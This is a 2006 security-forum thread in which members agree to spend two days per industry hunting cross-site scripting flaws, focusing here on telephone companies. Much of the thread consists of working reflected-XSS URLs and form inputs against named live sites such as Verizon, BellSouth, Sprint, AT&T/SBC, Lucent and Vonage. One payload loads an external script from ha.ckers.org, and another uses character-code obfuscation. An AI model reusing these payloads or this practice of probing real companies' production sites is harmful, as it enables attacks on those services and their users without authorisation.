Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Genre Thread
Posted by: rsnake
Date: October 20, 2006 10:28AM

One thing I've been doing since we started the so it begins thread is looking at particular genres. I just pick one (my latest one was greeting card companies). I was wondering if we should just make it a "thing" For two days (so that people in alternate time zones have plenty of time to try too) we pick a single genre to find issues with. What do you guys think?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Genre Thread
Posted by: Kyran
Date: October 20, 2006 10:38AM

Good idea. We will show the world XSS one industry at a time. :P

- Kyran

Options: ReplyQuote
Re: Genre Thread
Posted by: rsnake
Date: October 20, 2006 11:49AM

That was sorta my thought... also it shows how vulnerable everyone is... some days will be harder than others of course, but I think that is a good signal for who is doing it right and who is doing it wrong. It might actually give us some clues as to what's working and what isn't and why.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Genre Thread
Posted by: id
Date: October 20, 2006 11:56AM

I vote the porkrind industry for today.

-id

Options: ReplyQuote
Re: Genre Thread
Posted by: WhiteAcid
Date: October 20, 2006 12:13PM

Sounds great :)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Genre Thread
Posted by: id
Date: October 20, 2006 12:20PM



-id

Options: ReplyQuote
Re: Genre Thread
Posted by: rsnake
Date: October 20, 2006 06:41PM

Ugh, that's horrid. I'm not even a vegetarian but I think I'll eat a salad tonight.

How about something... real?

The word of the next few days is... telephony! Let's find some issues in telephone services or companies that provide telephony equipment.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Genre Thread
Posted by: Spikeman
Date: October 20, 2006 07:25PM

How about image hosting? The first XSS I posted on this site was on ImageShack. And I noticed someone had posted one on Photobucket.

Here's one I found in couple minutes, I'm sure there's more on that site with this kind of protection. http://www.imagehosting.us/users.php?&us_username=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&us_password=&us_cpassword=&us_email=&us_cemail=&Submit_x=28&Submit_y=5&Submit=Submit&action=register&error=Please+supply+a+password

Options: ReplyQuote
Re: Genre Thread
Posted by: WhiteAcid
Date: October 20, 2006 07:26PM

Which thread do we post these ones in?
Spikeman, that can be next or somewhere down the line, we really shouldn't change our genre or cause confusion.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Genre Thread
Posted by: maluc
Date: October 20, 2006 07:40PM

i already did most major mobile phone companies one day.. search for orange.com and the rest should be within a page. But there might've been some Ma Bells i left out.

-maluc

Options: ReplyQuote
Re: Genre Thread
Posted by: WhiteAcid
Date: November 13, 2006 02:33PM

Now this would have been perfect for throwing onto the IRC *cough* *cough*
What about 48 hours of finding flaws on celebrities web sites? Would allow for amusing alert boxes.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Genre Thread
Posted by: sjensen
Date: November 13, 2006 03:11PM

@rsnake - I found one on AT&T/SBC a day or two ago.

I'm going after Vonage...I hate those commercials!



Edited 2 time(s). Last edit at 11/13/2006 03:14PM by sjensen.

Options: ReplyQuote
Re: Genre Thread
Posted by: maluc
Date: November 13, 2006 03:53PM

well vonage has atleast one in their Help section ^^

-maluc

Options: ReplyQuote
Re: Genre Thread
Posted by: sjensen
Date: November 13, 2006 04:02PM

http://yellowpages.superpages.com/listings.jsp?N=&C=<script>alert('xss');</script>&STYPE=S&T=&S=ND&PG=L&R=N

The above is actually a redirection from http://www22.verizon.com/

http://www.bellsouth.com/
type (</script><script>alert('xss');</script>) in the "Search" box.

http://sprint.p.delivery.net/m/p/nxt/reg/cus/ereg.asp?email=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&id12=PERSONAL_email_registration&x=35&y=10

http://www.switchboard.com/bin/cgiqa.dll?SR=&MEM=4024&MEM2=1&FUNC=FORMATSEARCH&cid=&SR2=&MEM3=4023&L=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&F=&T=&S=PA&Search2.x=56&Search2.y=20



Edited 6 time(s). Last edit at 11/13/2006 04:17PM by sjensen.

Options: ReplyQuote
Re: Genre Thread
Posted by: sjensen
Date: November 13, 2006 04:37PM

http://att.sbc.com/search/att?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&category=&btnG=Search

http://www.cincinnatibell.com/search/default.asp?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=27&y=11

https://market.lucent.com/release/jsp/sso/login.jsp type ("><script>alert('xss');</script>) in the Username field.



Edited 2 time(s). Last edit at 11/13/2006 04:42PM by sjensen.

Options: ReplyQuote
Re: Genre Thread
Posted by: sjensen
Date: November 13, 2006 06:45PM

Not exactly xss, but nice error messages...

http://vonage.com/search_results.php?search_string=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&search.x=8&search.y=11

Options: ReplyQuote
Re: Genre Thread
Posted by: maluc
Date: November 13, 2006 07:06PM

the one i was referring to is:

http://www.vonage.com/help_knowledgeBase_index.php?search=asdf%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C%2Fscript%3E&x=0&y=0

-maluc

Options: ReplyQuote
Re: Genre Thread
Posted by: Kyran
Date: November 13, 2006 07:08PM

http://vonage.com/emailFriend.php?feature=%22%3E%3Cscript%3Evar%20Str=String.fromCharCode(120,115,115);alert(Str);%3C/script%3E

There ya go.

- Kyran

Options: ReplyQuote


Sorry, only registered users may post in this forum.